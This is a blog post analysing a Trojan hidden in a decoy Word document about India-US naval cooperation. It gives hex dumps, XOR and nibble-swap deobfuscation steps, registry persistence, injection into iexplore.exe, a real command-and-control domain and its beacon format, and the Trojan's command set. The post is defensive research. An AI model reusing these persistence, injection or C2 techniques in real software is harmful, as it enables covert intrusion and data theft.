India-United States Naval Cooperation.doc Analysis
3 comments Mar 30, 2011 | Posted by hbojaxhi in Malware
- Today I will analyze the following file and its payload.
File Name: file-1938795_doc File Size: 170854 bytes MD5: cc380bfd97164aff5878075e78570ada SHA1: 39ab7902e67f668fa0314fa02f6ca4a1ad1f009d AV: 7/41 (17.1%) VirusTotal
- This file was posted at http://contagiodump.blogspot.com/ and downloaded here.
- Typically I do not focus on the exploit because everyone else does.
- I do however focus on the obfuscation technique used in the sample. I typically start by dumping the file in WinHex to see if I can figure out how the payload is obfuscated. If I cannot, then I look at the shellcode. In this case the payload is not hidden very well.
- At file-offset 0×880 we see an executable file (in ASCII hex):
00000000 35 41 34 44 30 30 39 30 30 30 30 33 30 30 30 30 5A4D009000030000 00000010 30 30 30 34 30 30 30 30 46 46 46 46 30 30 30 30 00040000FFFF0000 00000020 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 00B8000000000000 00000030 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 0040000000000000 00000040 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00000050 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00000060 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000 00000070 30 30 30 30 30 30 30 30 30 30 45 38 30 30 30 30 0000000000E80000 00000080 31 46 30 45 30 45 42 41 42 34 30 30 43 44 30 39 1F0E0EBAB400CD09 00000090 42 38 32 31 34 43 30 31 32 31 43 44 36 38 35 34 B8214C0121CD6854 000000A0 37 33 36 39 37 30 32 30 36 46 37 32 37 32 36 37 736970206F727267 000000B0 36 44 36 31 36 33 32 30 36 45 36 31 36 46 36 45 6D6163206E616F6E 000000C0 32 30 37 34 36 35 36 32 37 32 32 30 36 45 37 35 2074656272206E75 000000D0 36 39 32 30 32 30 36 45 34 46 34 34 32 30 35 33 6920206E4F442053 000000E0 36 46 36 44 36 35 36 34 30 44 32 45 30 41 30 44 6F6D65640D2E0A0D 000000F0 30 30 32 34 30 30 30 30 30 30 30 30 30 30 30 30 0024000000000000 00000100 41 31 39 33 43 30 41 41 43 30 44 37 39 33 43 34 A193C0AAC0D793C4
- When we convert this ASCII hex into raw hex the executable is more apparent, however the first 0×200 bytes have been byte-swapped.
00000000 5A 4D 00 90 00 03 00 00 00 04 00 00 FF FF 00 00 ZM ÿÿ 00000010 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 ¸ @ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 è 00000040 1F 0E 0E BA B4 00 CD 09 B8 21 4C 01 21 CD 68 54 º´ Í ¸!L !ÍhT 00000050 73 69 70 20 6F 72 72 67 6D 61 63 20 6E 61 6F 6E sip orrgmac naon 00000060 20 74 65 62 72 20 6E 75 69 20 20 6E 4F 44 20 53 tebr nui nOD S 00000070 6F 6D 65 64 0D 2E 0A 0D 00 24 00 00 00 00 00 00 omed . $ 00000080 A1 93 C0 AA C0 D7 93 C4 ¡“ÀªÀדÄ
- Once we take care of the byte-swap, we carve out the following executable:
File Name: Payload.exe File Size: 38912 bytes MD5: c5860171f919761db9ee78ef3dac5ab4 SHA1: 91c40d179b68f27c2cc84214579fe940feb59539 PE Time: 0x4D06DE02 [Tue Dec 14 03:01:22 2010 UTC] AV: 21/41 (51.2%) VirusTotal
- And the following decoy file whose metadata suggests the document name was India-United States Naval Cooperation.doc:
File Name: decoy.doc File Size: 45392 bytes MD5: d471c78f4de177f959342814107ec3f4 SHA1: 186ed1d4f9f271c72f10e1fbd7c198854d14ff31
ANALYSIS – payload.exe
File Name: Payload.exe File Size: 38912 bytes MD5: c5860171f919761db9ee78ef3dac5ab4 SHA1: 91c40d179b68f27c2cc84214579fe940feb59539 PE Time: 0x4D06DE02 [Tue Dec 14 03:01:22 2010 UTC] AV: 21/41 (51.2%) VirusTotal
- This payload contains a resource type JPG (not really), which contains two obfuscated resources named 101 and 102, that it decrypts and save as two separate files:
- Here are the characteristics of these resources:
File Name: 101.res File Size: 4608 bytes MD5: 92c0cbcc8127c5b59ce3af37e454caae SHA1: 14f5fdcbbec17cb621f2b3c72e00d54efde437d4 File Name: 102.res File Size: 26932 bytes MD5: d4a79df7a9e459c51c1ef366fba01843 SHA1: 4e39a3b59c01da4834a4fd16dbb87748e129315
- Resource name 101 is saved under C:\Documents and Settings\username\Application Data\Microsoft\Messenger\Plugin, and it has the following characteristics:
File Name: msgslang.exe File Size: 4608 bytes MD5: 0835fbfd411d448e1e7b144f281a0ced SHA1: 4f2f79b368e1f871f3fdec797d0563785f50c25f PE Time: 0x4D06D945 [Tue Dec 14 02:41:09 2010 UTC] AV: 8/43 (18.6%) VirusTotal
- Resource name 102 is saved under: C:\Documents and Settings\username\Local Settings\Application Data\Microsoft\Media Player, and it has the following characteristics:
File Name: SOUND735.WAV File Size: 26932 bytes MD5: 7d2688c9dfb33be1c025216989376988 SHA1: c8968964cf4d38d9a516bf617d9cc10c8483862e AV: This file is encrypted and not a valid PE file.
- File msgslang.exe is then executed.
- File payload.exe also creates C:\Documents and Settings\username\a.hiv, which at first contains a hive dump of:
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
- A new registry key is created: SOFTWARE\printer and the data of a.hiv is restored here.
- A new entry is made under SOFTWARE\printer to entrench the Trojan:
- load = C:\DOCUME~1\username\Applic~1\MICROS~1\MESSEN~1\Plugin\msgslang.exe
- The data of hive SOFTWARE\printer is then dumped into C:\Documents and Settings\username\b.hiv and b.hiv is restored into:
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
- Files a.hiv and b.hiv are then deleted. In addition, registry key SOFTWARE\printer is also deleted.
- File payload.exe is then deleted.
ANALYSIS – msgslang.exe
- File msgslang.exe opens file SOUND735.WAV and XORs the whole file with 0×47.
- File msgslang.exe then launches an instance of iexplore.exe in suspended mode:
004012D1 |. 51 PUSH ECX ; /pProcessInfo 004012D2 |. 52 PUSH EDX ; |pStartupInfo 004012D3 |. 6A 00 PUSH 0 ; |CurrentDir = NULL 004012D5 |. 6A 00 PUSH 0 ; |pEnvironment = NULL 004012D7 |. 6A 04 PUSH 4 ; |CreationFlags = CREATE_SUSPENDED 004012D9 |. 6A 00 PUSH 0 ; |InheritHandles = FALSE 004012DB |. 6A 00 PUSH 0 ; |pThreadSecurity = NULL 004012DD |. 6A 00 PUSH 0 ; |pProcessSecurity = NULL 004012DF |. 8D8424 D4000000 LEA EAX, DWORD PTR SS:[ESP+D4] ; | 004012E6 |. 6A 00 PUSH 0 ; |CommandLine = NULL 004012E8 |. 50 PUSH EAX ; |ModuleFileName = "C:\Program Files\Internet Explorer\iexplore.exe" 004012E9 |. FF15 20204000 CALL DWORD PTR DS:[<&KERNEL32.Crea>; \CreateProcessA
- It then writes the decrypted content of SOUND735.WAV in the memory space of the newly created process.
- It then makes a call to CreateRemoteThread passing the address of where SOUND735.WAV was written to.
ANALYSIS - SOUND735.WAV (XOR-ed with 0x47)
- The first interesting thing that this thread does is to nibble-swap all the data starting from file-offset 0x461.
- If you have never seen nibble-swapping in assembly, here it is:
00150443 8A07 MOV AL, BYTE PTR DS:[EDI] 00150445 8AC8 MOV CL, AL 00150447 C0E0 04 SHL AL, 4 0015044A C0E9 04 SHR CL, 4 0015044D 80E1 0F AND CL, 0F 00150450 0AC1 OR AL, CL 00150452 8807 MOV BYTE PTR DS:[EDI], AL
- The nibble-swapped code is more opcode that is executed right away.
- This code first XORs 0×134 bytes of the nibble-swapped data (starting at file-offset 0x7C1) with 0×99.
- The configuration data of this Trojan is stored at the beginning of this file. At this point, since this data has already been XOR-ed with 0×47, the data is now XOR-ed with 0xFF (i.e. inverted). If you just wanted to get the configuration information from the original version of SOUND735.WAV you could have XOR-ed the file with 0xB8.
- The configuration information looks as follows:
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000030 34 69 00 00 0E 00 00 00 4i 00000040 09 00 00 00 D0 03 00 00 33 00 00 00 2E 04 00 00 Ð 3 . 00000050 21 00 00 00 61 04 00 00 54 61 72 67 65 74 00 00 ! a Target 00000060 00 00 00 00 01 00 00 00 73 70 6F 30 6C 73 76 2E spo0lsv. 00000070 65 78 65 00 00 00 00 00 00 00 00 00 6F 72 64 65 exe orde 00000080 72 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 r.exe 00000090 61 64 61 70 69 33 32 2E 64 6C 6C 00 00 00 00 00 adapi32.dll 000000A0 00 00 00 00 77 69 6E 65 63 6B 2E 64 61 74 00 00 wineck.dat 000000B0 00 00 00 00 00 00 00 00 77 69 6E 66 67 68 69 00 winfghi 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 77 69 6E 6A winj 000000D0 68 67 63 33 2E 64 6C 6C 00 00 00 00 00 00 00 00 hgc3.dll 000000E0 77 69 6D 6A 68 67 63 33 2E 64 6C 6C 00 00 00 00 wimjhgc3.dll 000000F0 00 00 00 00 28 6E 75 6C 6C 29 00 00 00 00 00 00 (null) 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000130 69 62 6D 2E 61 73 69 61 2D 6F 6E 6C 69 6E 65 2E ibm.asia-online. 00000140 75 73 3A 38 30 00 00 00 00 00 00 00 00 00 00 00 us:80 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000190 00 00 00 00 30 3A 38 30 00 00 00 00 00 00 00 00 0:80 000001A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001F0 00 00 00 00 00 00 00 00 30 3A 38 30 00 00 00 00 0:80 00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000250 00 00 00 00 00 00 00 00 00 00 00 00 30 3A 38 30 0:80 00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002C0 30 3A 38 30 00 00 00 00 00 00 00 00 00 00 00 00 0:80 000002D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000002F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000320 00 00 00 00 38 30 00 00 00 00 00 00 00 00 00 00 80 00000330 00 00 00 00 03 00 00 00 03 00 00 00 00 00 00 00 00000340 00 00 00 00 01 02 00 00 01 00 00 00 01 02 00 00 00000350 02 00 00 00 01 01 00 00 03 00 00 00 01 01 00 00 00000360 04 00 00 00 00 01 00 00 05 00 00 00 01 02 00 00 00000370 06 00 00 00 00 01 00 00 07 00 00 00 01 02 00 00 00000380 08 00 00 00 01 01 00 00 09 00 00 00 00 03 00 00 00000390 0A 00 00 00 00 03 00 00 0B 00 00 00 00 03 00 00 000003A0 0C 00 00 00 01 03 00 00 0D 00 00 00 01 03 00 00 000003B0 00 00 00 00 00 00 00 00 17 00 00 00 01 00 00 00 000003C0 64 61 74 00 00 00 00 00 00 00 00 00 00 00 00 00 dat
- As you can see, this Trojan can be configured with up to five domain/IP addresses.
- The configuration information is reformatted (shown below) and stored into the following file:
- C:\Documents and Settings\username\Cookies\wineck.dat
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000000 57 69 64 74 68 3A 03 00 00 00 0A 0D 44 65 70 74 Width: Dept 00000010 68 3A 03 00 00 00 0A 0D 41 64 64 72 31 3A 69 62 h: Addr1:ib 00000020 6D 2E 61 73 69 61 2D 6F 6E 6C 69 6E 65 2E 75 73 m.asia-online.us 00000030 3A 38 30 00 00 00 00 00 00 00 00 00 00 00 00 00 :80 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000080 00 00 0A 0D 41 64 64 72 32 3A 30 3A 38 30 00 00 Addr2:0:80 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0A 0D 000000F0 41 64 64 72 33 3A 30 3A 38 30 00 00 00 00 00 00 Addr3:0:80 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000150 00 00 00 00 00 00 00 00 00 00 0A 0D 41 64 64 72 Addr 00000160 34 3A 30 3A 38 30 00 00 00 00 00 00 00 00 00 00 4:0:80 00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001C0 00 00 00 00 00 00 0A 0D 41 64 64 72 35 3A 30 3A Addr5:0: 000001D0 38 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000001F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000230 00 00 0A 0D 53 6C 65 65 70 3A 00 00 00 00 00 00 Sleep: 00000240 00 00 00 00 00 00 00
-
- The timestamps of this file are backdated to those of svchost.exe.
- The encryption key used starts at file-offset 0x2E7C of SOUND735.WAV (reminder: to reveal the key you need to XOR this data with 0×47 and nibble-swap it).
- It is unclear where the key ends at this point (other than the end of the file).
- Here is a chunk of this key (i.e. this is not the complete key) just so that you have a reference:
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00002E70 7B 7C 7E 7F {|~
00002E80 80 7D 83 84 86 87 AD AE AF B0 B1 B2 B3 B4 B5 B6 €}ƒ„†‡®¯°±²³´µ¶
00002E90 DF E0 E1 E2 E3 E4 E5 E6 E7 E8 CF D0 D1 D2 93 94 ßàáâãäåæçèÏÐÑÒ“”
00002EA0 95 96 06 07 2E EA EB EC ED EE EF F0 F1 F2 32 36 •– .êëìíîïðñò26
00002EB0 37 38 39 3A 23 24 3E FB 4D 9A 9B 9C 9D 9E 9F A0 789:#$>ûMš›œ žŸ
00002EC0 A1 A2 B7 B8 B9 BA BB BC BD BF C0 C1 E3 E5 E6 E4 ¡¢·¸¹º»¼½¿ÀÁãåæä
00002ED0 2F 30 31 32 33 34 17 18 19 1A 1B 1C 1D 1E 92 1F /01234 ’
00002EE0 21 22 23 24 25 26 27 28 29 2A 53 54 55 56 57 40 !"#$%&'()*STUVW@
00002EF0 41 42 43 5C 5D 5E 5F 60 61 62 63 64 65 66 67 68 ABC\]^_`abcdefgh
00002F00 90 6A 6B BE 6E 6F 72 6C 6D 73 74 75 70 C6 71 78 jk¾norlmstupÆqx
00002F10 79 7A 0B 0C 09 0D 0E 0F 10 11 12 13 FD FE C2 C5 yz ýþÂÅ
00002F20 76 77 C7 C8 C9 CA 8F 69 91 92 94 95 4A 4B 93 4C vwÇÈÉÊ i‘’”•JK“L
00002F30 49 96 97 98 99 4E 4F 50 51 52 A3 A4 A5 A6 A7 A9 I–—˜™NOPQR£¤¥¦§©
00002F40 AA AB A8 AC DF E0 E1 E2 2B 2C 2D E7 E8 E9 85 81 ª«¨¬ßàáâ+,-çèé…
00002F50 82 88 89 8B 8C 8A 8D 8E CB CC CD CE 90 91 8F D3 ‚ˆ‰‹ŒŠ ŽËÌÍÎ ‘ Ó
00002F60 D4 D5 D6 D7 D8 D9 DA DB DC DD DE 14 3F 58 59 5A ÔÕÖ×ØÙÚÛÜÝÞ ?XYZ
00002F70 5B 44 45 46 47 48 E9 EA 5E 5F 60 61 EF F0 F1 F2 [DEFGHéê^_`aïðñò
00002F80 F3 F4 F5 F6 F7 F8 F9 20 FA FB FC C3 C4 FF 15 16 óôõö÷øù úûüÃÄÿ
00002F90 15 16 FA 11 3F 40 41 42 43 44 45 46 47 22 CB CC ú ?@ABCDEFG"ËÌ
00002FA0 CD CE CF D0 D1 D2 D3 D4 17 18 1A F5 1B 1D 1E 1F ÍÎÏÐÑÒÓÔ õ
00002FB0 19 20 48 21 23 24 25 26 27 28 29 2A 2B 2C 2D 2E H!#$%&'()*+,-.
00002FC0 30 31 32 33 2F 34 35 36 37 38 39 3A 3B 3C 3D 3E 0123/456789:;<=>
00002FD0 C1 C2 C3 C4 C5 C6 C7 C8 C9 CA 35 36 37 38 39 3A ÁÂÃÄÅÆÇÈÉÊ56789:
- The Trojan resolves ibm.asia-online.us and connects over TCP port 80. At the time of this writing this domain name resolves to IP address 96.44.167.103, however this IP address is not accepting connections on port 80. So, I do not have any sample network data to work with.
- The Trojan sends the following type of request:
POST /5501000000/log HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 Host: ibm.asia-online.us:80 Content-Length: 90 Proxy-Connection: Keep-Alive 00000000 79 7F 24 7F 80 7D 43 2C 87 E3 DB C7 CC C4 D8 DF y $ €}C,‡ãÛÇÌÄØß 00000010 B3 B4 B5 B6 DF E0 E1 E2 E3 E4 E4 E6 E5 E8 CE D0 ³´µ¶ßàáâãääæåèÎÐ 00000020 85 B3 E1 F3 F0 E2 06 07 23 EA EB EC ED EE EF BE …³áóðâ #êëìíîï¾ 00000030 F1 F2 32 36 32 39 0A DE 27 24 49 92 23 FF F8 F7 ñò2629 Þ'$I’#ÿø÷ 00000040 B3 FA E8 C9 CF C4 D0 D0 D0 BA CC D5 D3 D5 A8 A6 ³úèÉÏÄÐÐкÌÕÓÕ¨¦ 00000050 80 D6 91 8D 42 5A 59 55 50 07 €Ö‘ BZYUP
- The data above is encrypted using the same key that was used for file wineck.dat. This data is shown in its decrypted form below:
00000000 02 03 5A 00 00 00 C0 A8 01 64 76 69 63 74 69 6D Z ˬ dvictim
00000010 00 00 00 00 00 00 00 00 00 00 01 00 02 00 01 00
00000020 54 61 72 67 65 74 00 00 0D 00 00 00 00 00 00 4E Target N
00000030 00 00 00 00 05 01 33 E4 04 00 77 69 6E 65 63 6B 3ä wineck
00000040 2E 64 77 69 6E 66 67 68 69 00 77 69 6E 6A 68 67 .dwinfghi winjhg
00000050 63 33 77 69 6D 6A 68 67 63 33 c3wimjhgc3
- The data received from the C2 node is expected to be encrypted using the same key.
- The structure of the data received from the C2 node is as follows:
- BYTE 0 = must be 0×02
- BYTE 1 = was not checked in my tests
- BYTES 2-5 = length of data.
- BYTES 6-29 = not checked.
- BYTE 30 = Commands (0×03 – 0×08, 0x0A, and 0x0D)
- BYTES 31 – 34 = File offset (if applicable)
- BYTES 35 – ?? = String (filename or sleep time). File name can include file path otherwise defaults to system32.
- Here is what I got for the commands (byte 30) that this Trojan interprets:
- 0×03 – Sleep for 50 seconds.
- 0×04 – Download a file (to the victim)
- 0×05 – Upload a file (to the C2 node)
- 0×06 – Sleep for 50 seconds.
- 0×07 – Sleep for 50 seconds.
- 0×08 – Doing something with a file (execute maybe).
- 0x0A – Long sleep in 5 seconds chunks.
- 0x0D – Set the sleep time in the wineck.dat file (remember the sleep time was not set initially)
- This is as far as I am taking this one.
Questions?
I know it would be time consuming but any way one of these days you can do a very step-by-step write up of how (including what tools) you use (and commands) to de-obfuscate a malicious file and how exactly you “carve” out an exe? Some day even just 1 write up like this would be very very helpful!
I will consider adding a Tutorial category.